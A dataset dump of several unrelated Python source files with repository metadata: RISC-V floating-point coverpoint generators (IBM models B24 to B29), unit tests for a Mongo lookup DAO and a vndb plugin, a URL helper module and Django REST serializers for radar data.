        - Depending on the value of flen, the values are converted into their respective IEEE 754 hexadecimal values.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    getcontext().prec = 40
    operations = ['+','-']
    nums = [0,0.01,0.1,0.11]
    minnums = [0,1]
    dataset = []
    for minnum in minnums:
        for num in nums:
            for op1 in operations:
                for op2 in operations:
                    # Compute the value arithmetically instead of eval()-ing the
                    # assembled expression string: identical result, no dynamic
                    # code execution.
                    value = (minnum if op1 == '+' else -minnum) + (num if op2 == '+' else -num)
                    dataset.append((value, op1 + str(minnum) + op2 + str(num)))
    b24_comb = []
    for data in dataset:
        t = "{:e}".format(data[0])
        b24_comb.append((floatingPoint_tohex(flen,float(t)),data[1]))
    # Deduplicate (e.g. +0+0 and +0-0 encode identically).
    # NOTE(review): set iteration order is hash-dependent, so coverpoint order
    # may vary between runs — confirm downstream consumers don't rely on order.
    b24_comb = set(b24_comb)
    coverpoints = []
    for c in b24_comb:
        for rm in range(0,5):
            cvpt = ""
            for x in range(1, ops+1):
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '
            # NOTE(review): `opcode in "fcvt.d.s"` is a substring test of the
            # opcode *inside* the literal; preserved as-is.
            if "fmv" in opcode or opcode in "fcvt.d.s":
                cvpt += '0'
            else:
                cvpt += str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += " | "+c[1]
            coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B24 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b25(flen, opcode, ops, seed=10):
    '''
    IBM Model B25 Definition:
        This model creates a test-case for each of the following inputs:

        1. ±MaxInt
        2. ±0
        3. ±1
        4. Random number

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to 10)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand 1 = [±MaxInt, ±0, ±1, Random number]

    Implementation:
        - The dataset is formed as per the dataset description.
        - rand_num is initialized to a random number in the range (1, maxnum).
        - Since this model is for an integer to floating point conversion instruction, the operands are presented in decimal format.
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    random.seed(seed)
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    getcontext().prec = 40
    dataset = [(0,"0"),(1,"1"),(-1,"-1")]
    # NOTE(review): for flen values other than 32/64 `maxnum` is unbound and the
    # appends below raise NameError — confirm callers only pass 32/64.
    if flen == 32:
        maxnum = 2**31-1
    elif flen == 64:
        maxnum = 2**63-1
    dataset.append((maxnum,"MaxInt"))
    dataset.append((-1*maxnum,"-MaxInt"))
    rand_num = int(random.uniform(1,maxnum))
    dataset.append((rand_num,"+ve Random Number"))
    dataset.append((-1*rand_num,"-ve Random Number"))
    b25_comb = [(int(value), label) for value, label in dataset]
    coverpoints = []
    for c in b25_comb:
        for rm in range(0,5):
            cvpt = ""
            # NOTE(review): the register name is hard-coded to rs1 even when
            # ops > 1; preserved because this model targets single-operand
            # conversion instructions — confirm ops is always 1 here.
            for x in range(1, ops+1):
                cvpt += "rs1_val == "+str(c[x-1])
                cvpt += " and "
            cvpt += 'rm_val == '
            # NOTE(review): `opcode in "fcvt.d.wu"` is a substring test of the
            # opcode *inside* the literal; preserved as-is.
            if "fmv" in opcode or opcode in "fcvt.d.wu":
                cvpt += str(0)
            else:
                cvpt += str(rm)
            cvpt += ' # Number = '
            cvpt += c[1]
            coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B25 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b26(xlen, opcode, ops, seed=10):
    '''
    IBM Model B26 Definition:
        Exercises every possible count of significant bits in the integer input
        operand by drawing one example from each of the ranges:
        [0], [1], [2,3], [4,7], [8,15], ..., [(MaxInt+1)/2, MaxInt]

    :param xlen: Size of the integer registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to 10)
    :type xlen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand 1 = Random number in [0], [1], [2,3], [4,7], [8,15], ..., [(MaxInt+1)/2, MaxInt]

    Implementation:
        - One random value is drawn from each power-of-two range listed above.
        - Operands are emitted in decimal form, since this model targets integer
          to floating point conversion instructions.
        - Each datapoint is paired with every rounding mode of the opcode.
    '''
    random.seed(seed)
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    dataset = [(0," # Number in [0]"),(1," # Number in [1]")]
    upper = 3
    limit = 2**(xlen-1)-1
    while upper <= limit:
        lower = int((upper+1)/2)
        sample = random.randint(lower, upper)
        dataset.append((sample, " # Random number chosen in the range: ["+str(lower)+", "+str(upper)+"]"))
        upper = upper*2+1
    # Conversions that ignore the dynamic rounding mode pin rm to 0.
    fixed_rounding = "fmv" in opcode or opcode in "fcvt.d.wu"
    coverpoints = []
    for entry in dataset:
        for rm in range(5):
            pieces = []
            for x in range(1, ops+1):
                pieces.append("rs1_val == "+str(entry[x-1]))
                pieces.append(" and ")
            pieces.append('rm_val == ')
            pieces.append(str(0) if fixed_rounding else str(rm))
            pieces.append(entry[1])
            coverpoints.append("".join(pieces))
    count = len(coverpoints)
    mess = 'Generated' + (' '*(5-len(str(count)))) + str(count) + ' ' + \
        (str(32) if xlen == 32 else str(64)) + '-bit coverpoints using Model B26 for ' + opcode + ' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b27(flen, opcode, ops, seed=10):
    '''
    IBM Model B27 Definition:
        This model tests the conversion of NaNs from a wider format to a narrow one. Each combination from the following table will create one test case (N represents the number of bits in the significand of the destination's format):
        [SNaN, QNaN]

        ==================== ========================================================= =====================
        Value of the operand The N-1 MSB bits of the significand (excluding the first) The rest of the bits
        ==================== ========================================================= =====================
        QNaN                 All 0                                                     All 0
        SNan                 Not all 0                                                 Not all 0
        ==================== ========================================================= =====================

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to 10; not used by this model)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand 1 = [ SNaN, QNaN ]

    Implementation:
        - Dataset is the combination of snan and qnan values predefined at random initially.
        - Depending on the value of flen, these values are then converted into their respective IEEE 754 hexadecimal values.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode 0 for that particular opcode.
    '''
    # Keep only the first two dot-separated fields of the opcode (e.g. "fcvt.s.d" -> "fcvt.s").
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    # fsnan/fqnan and dsnan/dqnan are module-level lists of NaN encodings for
    # single/double precision respectively.
    # NOTE(review): if flen is neither 32 nor 64, `dataset` is never bound and
    # the loop below raises NameError — confirm callers only pass 32/64.
    if flen == 32:
        dataset = fsnan + fqnan
    elif flen == 64:
        dataset = dsnan + dqnan
    coverpoints = []
    for c in dataset:
        cvpt = ""
        # Field constraints (sign/exponent/mantissa) for each register operand.
        for x in range(1, ops+1):
            cvpt += (extract_fields(flen,c,str(x)))
            cvpt += " and "
        # NaN handling is rounding-independent, so only rm 0 is emitted.
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        # Human-readable comment part: the raw operand value(s).
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c) + '(' + str(c) + ')'
            if(y != ops):
                cvpt += " and "
        coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B27 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b28(flen, opcode, ops, seed=10):
    '''
    IBM Model B28 Definition:
        This model tests the conversion of a floating point number to an integral value, represented in floating-point format. A test case will be created for each of the following inputs:

        1. +0
        2. A random number in the range (+0, +1)
        3. +1
        4. Every value in the range (1.00, 10.11] (1 to 2.75 in jumps of 0.25)
        5. A random number in the range (+1, +1.11..11*2^precision)
        6. +1.11..11*2^precision
        7. +Infinity
        8. NaN
        9. -0
        10. A random number in the range (-1, -0)
        11. -1
        12. Every value in the range [-10.11, -1.00)
        13. A random number in the range (-1.11..11*2^precision , -1)
        14. -1.11..11*2^precision
        15. -Infinity

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to 10. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand 1 = [ ±0, ±1, ±Infinity, Default NaN, A random number in the range (+0, +1), Every value in the range (1.00, 10.11] (1 to 2.75 in jumps of 0.25), A random number in the range (+1, +1.11..11*2^precision), ±1.11..11*2^precision, A random number in the range (-1, -0), Every value in the range [-10.11, -1.00), A random number in the range (-1.11..11*2^precision , -1) ]

    Implementation:
        - According to the given inputs, all cases are declared and appended to the dataset for flen=32 and flen=64.
        - Random numbers are obtained in the respective ranges and for absolute values, it is inherited from the dataset definition.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode "0" for that particular opcode.
    '''
    random.seed(seed)
    # Keep only the first two dot-separated fields of the opcode.
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    # Each dataset entry is (hex encoding, human-readable description).
    # fzero/fone/finfinity/fsnan/fqnan (and d* for doubles) are module-level
    # lists indexed [positive, negative].
    dataset = []
    if flen == 32:
        dataset.append((fzero[0],"+0"))
        dataset.append((floatingPoint_tohex(32,float(random.uniform(0,1))),"A random number in the range (+0, +1)"))
        dataset.append((fone[0],"+1"))
        # 1.25 .. 2.75 in steps of 0.25 (integer loop avoids float accumulation).
        for i in range(125,300,25):
            dataset.append((floatingPoint_tohex(32, i/100),"Number = "+str(i/100)+" => Number ∈ (1,2.75]"))
        dataset.append((floatingPoint_tohex(32,float(random.uniform(1,2**31-1))),"A random number in the range (+1, +1.11..11*2^precision)"))
        dataset.append((floatingPoint_tohex(32,float(2**31-1)),"MaxInt"))
        dataset.append((finfinity[0],"+Infinity"))
        dataset.append((fsnan[0],"Signaling NaN"))
        dataset.append((fqnan[0],"Quiet NaN"))
        dataset.append((fzero[1],"-0"))
        dataset.append((floatingPoint_tohex(32,float(random.uniform(-1,0))),"A random number in the range (-1, -0)"))
        dataset.append((fone[1],"-1"))
        for i in range(-275,-100,25):
            dataset.append((floatingPoint_tohex(32, i/100),"Number = "+str(i/100)+" => Number ∈ [-2.75,-1)"))
        # NOTE(review): -2**31-1 parses as -(2**31)-1, one below -MaxInt;
        # presumably -(2**31-1) was intended — confirm before changing.
        dataset.append((floatingPoint_tohex(32,float(random.uniform(-2**31-1,-1))),"A random number in the range (-1.11..11*2^precision, -1)"))
        dataset.append((floatingPoint_tohex(32,float(-2**31-1)),"-MaxInt"))
        dataset.append((finfinity[1],"-Infinity"))
    elif flen == 64:
        dataset.append((dzero[0],"+0"))
        dataset.append((floatingPoint_tohex(64,float(random.uniform(0,1))),"A random number in the range (+0, +1)"))
        dataset.append((done[0],"+1"))
        for i in range(125,300,25):
            dataset.append((floatingPoint_tohex(64, i/100),"Number = "+str(i/100)+" => Number ∈ (1,2.75]"))
        dataset.append((floatingPoint_tohex(64,float(random.uniform(1,2**63-1))),"A random number in the range (+1, +1.11..11*2^precision)"))
        dataset.append((floatingPoint_tohex(64,float(2**63-1)),"MaxInt"))
        dataset.append((dinfinity[0],"+Infinity"))
        dataset.append((dsnan[0],"Signaling NaN"))
        dataset.append((dqnan[0],"Quiet NaN"))
        dataset.append((dzero[1],"-0"))
        dataset.append((floatingPoint_tohex(64,float(random.uniform(-1,0))),"A random number in the range (-1, -0)"))
        dataset.append((done[1],"-1"))
        for i in range(-275,-100,25):
            dataset.append((floatingPoint_tohex(64, i/100),"Number = "+str(i/100)+" => Number ∈ [-2.75,-1)"))
        # NOTE(review): same -2**63-1 vs -(2**63-1) question as the 32-bit branch.
        dataset.append((floatingPoint_tohex(64,float(random.uniform(-2**63-1,-1))),"A random number in the range (-1.11..11*2^precision, -1)"))
        dataset.append((floatingPoint_tohex(64,float(-2**63-1)),"-MaxInt"))
        dataset.append((dinfinity[1],"-Infinity"))
    coverpoints = []
    for c in dataset:
        cvpt = ""
        # Field constraints (sign/exponent/mantissa) for each register operand.
        for x in range(1, ops+1):
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        # Human-readable comment part: raw operand value(s) plus description.
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += " | "+c[1]
        coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B28 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b29(flen, opcode, ops, seed=10):
    '''
    IBM Model B29 Definition:
        This model checks different cases of rounding of the floating point number. A test will be created for each possible combination of the Sign, LSB, Guard bit and the Sticky bit (16 cases for each operation).

        Rounding Mode: All

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to 10)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand 1 = [All possible combinations of Sign, LSB, Guard and Sticky are taken]

    Implementation:
        - A random mantissa is obtained and is iterated for each sign in each digit in the binary number.
        - The exponent is always maintained at -3, in order to facilitate the shift process that occurs during the actual conversion.
        - The respective hexadecimal values are appended to the dataset along with the respective Least, Guard and Sticky bit value wherever available.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    random.seed(seed)
    sgns = ["0","1"]
    dataset = []
    # Each entry packs sign | biased-exponent(-3) | random mantissa bits |
    # the 3-bit Least/Guard/Sticky tail, then encodes it as hex. The leading
    # "1" prepended before int() preserves leading zero bits and is dropped
    # again by the [3:] slice.
    if flen == 32:
        mant = random.getrandbits(20)
        mant = '{:020b}'.format(mant)
        for sgn in sgns:
            for i in range(8):
                LeastGuardSticky = '{:03b}'.format(i)
                hexnum = "0x" + hex(int("1"+sgn + "01111100" + mant + LeastGuardSticky,2))[3:]
                dataset.append((hexnum,"Exp = -3; Sign = {}; LSB = {}; Guard = {}; Sticky = {}"\
                    .format(sgn,LeastGuardSticky[0],LeastGuardSticky[1],LeastGuardSticky[2])))
    elif flen == 64:
        mant = random.getrandbits(49)
        mant = '{:049b}'.format(mant)
        for sgn in sgns:
            for i in range(8):
                LeastGuardSticky = '{:03b}'.format(i)
                hexnum = "0x" + hex(int("1"+sgn + "01111111100" + mant + LeastGuardSticky,2))[3:]
                dataset.append((hexnum,"Exp = -3; Sign = {}; LSB = {}; Guard = {}; Sticky = {}"\
                    .format(sgn,LeastGuardSticky[0],LeastGuardSticky[1],LeastGuardSticky[2])))
    coverpoints = []
    for c in dataset:
        for rm in range(0,5):
            cvpt = ""
            # Field constraints (sign/exponent/mantissa) per register operand.
            for x in range(1, ops+1):
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '
            # NOTE(review): unlike B23/B24 this uses `"fcvt.d.s" in opcode`
            # (literal inside opcode) rather than the reversed substring test —
            # confirm which direction the sibling models should use.
            if "fmv" in opcode or "fcvt.d.s" in opcode:
                cvpt += '0'
            else:
                cvpt += str(rm)
            cvpt += ' # '
            # Human-readable comment part: raw operand value(s) plus description.
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += " | "+c[1]
            coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B29 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
| 5,751 | 0 | 139 |
c0b27db7a8e229092100d40b2d289c9c75ecbf16 | 2,545 | py | Python | dialogue-engine/test/programytest/storage/stores/nosql/mongo/dao/test_lookup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 104 | 2020-03-30T09:40:00.000Z | 2022-03-06T22:34:25.000Z | dialogue-engine/test/programytest/storage/stores/nosql/mongo/dao/test_lookup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 25 | 2020-06-12T01:36:35.000Z | 2022-02-19T07:30:44.000Z | dialogue-engine/test/programytest/storage/stores/nosql/mongo/dao/test_lookup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 10 | 2020-04-02T23:43:56.000Z | 2021-05-14T13:47:01.000Z | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programy.storage.stores.nosql.mongo.dao.lookup import Lookup
| 45.446429 | 126 | 0.708055 | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programy.storage.stores.nosql.mongo.dao.lookup import Lookup
class LookupTests(unittest.TestCase):
    """Unit tests for the Mongo Lookup DAO's document round-tripping."""
    def test_init_no_id(self):
        """A freshly constructed Lookup has no id and serializes without `_id`."""
        lookup = Lookup(key='key1', value='value1')
        self.assertIsNotNone(lookup)
        self.assertIsNone(lookup.id)
        self.assertEqual('key1', lookup.key)
        self.assertEqual('value1', lookup.value)
        self.assertEqual({'key': 'key1', 'value': 'value1'}, lookup.to_document())
    def test_init_with_id(self):
        """Assigning an id after construction includes `_id` in the document."""
        lookup = Lookup(key='key1', value='value1')
        lookup.id = '666'
        self.assertIsNotNone(lookup)
        self.assertIsNotNone(lookup.id)
        self.assertEqual('666', lookup.id)
        self.assertEqual('key1', lookup.key)
        self.assertEqual('value1', lookup.value)
        self.assertEqual({'_id': '666', 'key': 'key1', 'value': 'value1'}, lookup.to_document())
    def test_from_document(self):
        """from_document restores key/value, and `_id` only when present."""
        lookup1 = Lookup.from_document({'key': 'key1', 'value': 'value1'})
        self.assertIsNotNone(lookup1)
        self.assertIsNone(lookup1.id)
        self.assertEqual('key1', lookup1.key)
        self.assertEqual('value1', lookup1.value)
        lookup2 = Lookup.from_document({'_id': '666', 'key': 'key1', 'value': 'value1'})
        self.assertIsNotNone(lookup2)
        self.assertIsNotNone(lookup2.id)
        self.assertEqual('666', lookup2.id)
        self.assertEqual('key1', lookup2.key)
        self.assertEqual('value1', lookup2.value)
| 1,270 | 16 | 104 |
63f183b40929af676339e7b26d3fac102920b43b | 1,650 | py | Python | omnipresence/plugins/vndb/test_vndb.py | kxz/omnipresence | ffb3dbc30d36331a68e8dea3a85db6a4d2928cd7 | [
"BSD-3-Clause"
] | null | null | null | omnipresence/plugins/vndb/test_vndb.py | kxz/omnipresence | ffb3dbc30d36331a68e8dea3a85db6a4d2928cd7 | [
"BSD-3-Clause"
] | 10 | 2016-04-05T04:36:15.000Z | 2018-03-25T00:15:47.000Z | omnipresence/plugins/vndb/test_vndb.py | kxz/omnipresence | ffb3dbc30d36331a68e8dea3a85db6a4d2928cd7 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8
"""Unit tests for the vndb event plugin."""
# pylint: disable=missing-docstring,too-few-public-methods
from twisted.internet.defer import inlineCallbacks
from twisted.trial.unittest import TestCase
from ...message import collapse
from ...test.helpers import CommandTestMixin
from . import Default
| 34.375 | 68 | 0.669091 | # -*- coding: utf-8
"""Unit tests for the vndb event plugin."""
# pylint: disable=missing-docstring,too-few-public-methods
from twisted.internet.defer import inlineCallbacks
from twisted.trial.unittest import TestCase
from ...message import collapse
from ...test.helpers import CommandTestMixin
from . import Default
class VNDBTestCase(CommandTestMixin, TestCase):
    """Exercises the vndb command plugin against recorded HTTP cassettes."""
    command_class = Default
    @CommandTestMixin.use_cassette('vndb/no-results')
    @inlineCallbacks
    def test_no_results(self):
        """A query with no matches produces no reply at all."""
        yield self.send_command('slartibartfast')
        yield self.assert_no_replies()
    @CommandTestMixin.use_cassette('vndb/single-result')
    @inlineCallbacks
    def test_single_result(self):
        """A unique match yields exactly one formatted reply."""
        yield self.send_command('muv-luv alternative total eclipse')
        yield self.assert_reply(collapse(u"""\
            https://vndb.org/v7052 —
            \x02Muv-Luv Alternative - Total Eclipse\x02
            (\x02マブラヴ オルタネイティヴ トータル・イクリプス\x02),
            first release 2007-08-31 — rated 7.27 (40)"""))
        yield self.assert_no_replies()
    @CommandTestMixin.use_cassette('vndb/multiple-results')
    @inlineCallbacks
    def test_multiple_results(self):
        """Multiple matches yield one reply per result, in cassette order."""
        yield self.send_command('ever17')
        yield self.assert_reply(collapse(u"""\
            https://vndb.org/v17 —
            \x02Ever17 -The Out of Infinity-\x02,
            first release 2002-08-29 — rated 8.71 (3763)"""))
        yield self.assert_reply(collapse(u"""\
            https://vndb.org/v3794 —
            \x02Ever17 CrossOver Impression\x02,
            first release 2005-12-30 — rated 6.20 (3)"""))
        yield self.assert_no_replies()
| 992 | 369 | 23 |
1a387f0a7ab6513e1c619e55b24ae2df58847192 | 1,225 | py | Python | propane/urls.py | tylerbutler/propane | 6c404285ab8d78865b7175a5c8adf8fae12d6be5 | [
"MIT"
] | 1 | 2017-12-21T18:16:20.000Z | 2017-12-21T18:16:20.000Z | propane/urls.py | tylerbutler/propane | 6c404285ab8d78865b7175a5c8adf8fae12d6be5 | [
"MIT"
] | null | null | null | propane/urls.py | tylerbutler/propane | 6c404285ab8d78865b7175a5c8adf8fae12d6be5 | [
"MIT"
] | null | null | null | # coding=utf-8
from __future__ import absolute_import, print_function
import posixpath
from urllib import urlencode
# noinspection PyUnresolvedReferences
from six.moves.urllib.parse import parse_qsl, urlsplit, urlunsplit
__author__ = 'Tyler Butler <tyler@tylerbutler.com>'
try:
# noinspection PyUnresolvedReferences
from propane.flask.urls import *
except ImportError:
pass
| 29.166667 | 105 | 0.689796 | # coding=utf-8
from __future__ import absolute_import, print_function
import posixpath
from urllib import urlencode
# noinspection PyUnresolvedReferences
from six.moves.urllib.parse import parse_qsl, urlsplit, urlunsplit
__author__ = 'Tyler Butler <tyler@tylerbutler.com>'
try:
# noinspection PyUnresolvedReferences
from propane.flask.urls import *
except ImportError:
pass
def remove_query_parameters(url, params=None, case_sensitive=False):
    """Return *url* with query parameters removed.

    If *params* is None the whole query string is stripped; otherwise only the
    named parameters are removed, case-insensitively unless *case_sensitive*
    is True. The *params* list passed by the caller is never modified (the
    previous implementation lower-cased it in place via ``params[:] = ...``).
    """
    pieces = list(urlsplit(url))
    if params is None:
        pieces[3] = ''
    else:
        if case_sensitive:
            to_remove = set(params)
            query = [(p, v) for p, v in parse_qsl(pieces[3]) if p not in to_remove]
        else:
            # upper().lower() mirrors the original normalization on both sides.
            to_remove = {p.upper().lower() for p in params}
            query = [(p, v) for p, v in parse_qsl(pieces[3])
                     if p.upper().lower() not in to_remove]
        pieces[3] = urlencode(query, doseq=True)
    return urlunsplit(pieces)
def urljoin(url1, *url2):
    """Join URL fragments using POSIX path semantics.

    urlparse.urljoin mishandles plain fragment joins in some cases, so the
    pieces are folded together with posixpath.join instead.
    """
    joined = url1
    for fragment in url2:
        joined = posixpath.join(joined, fragment)
    return joined
| 787 | 0 | 46 |
34e31fa7eb54e39276821d4e196a0a84d638c343 | 1,804 | py | Python | api/serializers.py | guica/api_dados_radar | daae88ef4c6d4501c73010453839d8289c0274c4 | [
"MIT"
] | null | null | null | api/serializers.py | guica/api_dados_radar | daae88ef4c6d4501c73010453839d8289c0274c4 | [
"MIT"
] | 10 | 2020-02-12T03:19:25.000Z | 2021-12-13T20:26:40.000Z | api/serializers.py | guica/api_dados_radar | daae88ef4c6d4501c73010453839d8289c0274c4 | [
"MIT"
] | null | null | null | from rest_framework import serializers
from radar.models import BaseRadares, Contagens, Viagens, Trajetos
from rest_framework_cache.serializers import CachedSerializerMixin
from rest_framework_cache.registry import cache_registry
cache_registry.register(BaseRadaresSerializer)
cache_registry.register(ContagensSerializer)
| 24.053333 | 80 | 0.538803 | from rest_framework import serializers
from radar.models import BaseRadares, Contagens, Viagens, Trajetos
from rest_framework_cache.serializers import CachedSerializerMixin
from rest_framework_cache.registry import cache_registry
class BaseRadaresSerializer(CachedSerializerMixin, serializers.ModelSerializer):
    """Serializer for speed-camera (radar) base records, with response caching
    via CachedSerializerMixin (registered with cache_registry at module level)."""
    class Meta:
        model = BaseRadares
        # Explicit field whitelist mirroring the BaseRadares model columns.
        fields = [
            'id',
            'lote',
            'codigo',
            'endereco',
            'sentido',
            'referencia',
            'tipo_equip',
            'enquadrame',
            'qtde_fxs_f',
            'data_publi',
            'velocidade',
            'latitude_l',
            'latitude',
            'longitude',
            'ligado',
            'data_desli',
            'motivo_des',
            'mi_style',
            'mi_prinx',
            'geom',
            'emme_gid',
            'mdc_gid',
        ]
cache_registry.register(BaseRadaresSerializer)
class ContagensSerializer(CachedSerializerMixin, serializers.ModelSerializer):
    """Serializer for radar count records, with response caching.

    'acuracia' and 'autuacoes_por_placas' are presumably computed
    properties on the Contagens model rather than columns — TODO confirm.
    """
    class Meta:
        model = Contagens
        fields = [
            'data_e_hora',
            'localidade',
            'tipo',
            'contagem',
            'autuacoes',
            'placas',
            'acuracia',
            'autuacoes_por_placas'
        ]
cache_registry.register(ContagensSerializer)
class ViagensSerializer(serializers.ModelSerializer):
    """Serializer for trip (Viagens) records; not cached, unlike the radar
    and count serializers above."""
    class Meta:
        model = Viagens
        fields = [
            'id',
            'data_inicio',
            'data_final',
            'inicio',
            'final',
            'tipo',
            'distancia'
        ]
class TrajetosSerializer(serializers.ModelSerializer):
    """Serializer for route (Trajetos) records, exposing every model field."""
    class Meta:
        model = Trajetos
        # Removed stray non-Python artifact that was fused onto this line
        # (dataset-dump residue), which made the module unparseable.
        fields = '__all__'
2a33d92b09cdd36e7f6ec1fff6cef6606fe79768 | 1,680 | py | Python | backend/underbudget/models/balance.py | vimofthevine/underbudget4 | c90eecf9879f7ce57c77a68b3f83b1d76c4451af | [
"MIT"
] | null | null | null | backend/underbudget/models/balance.py | vimofthevine/underbudget4 | c90eecf9879f7ce57c77a68b3f83b1d76c4451af | [
"MIT"
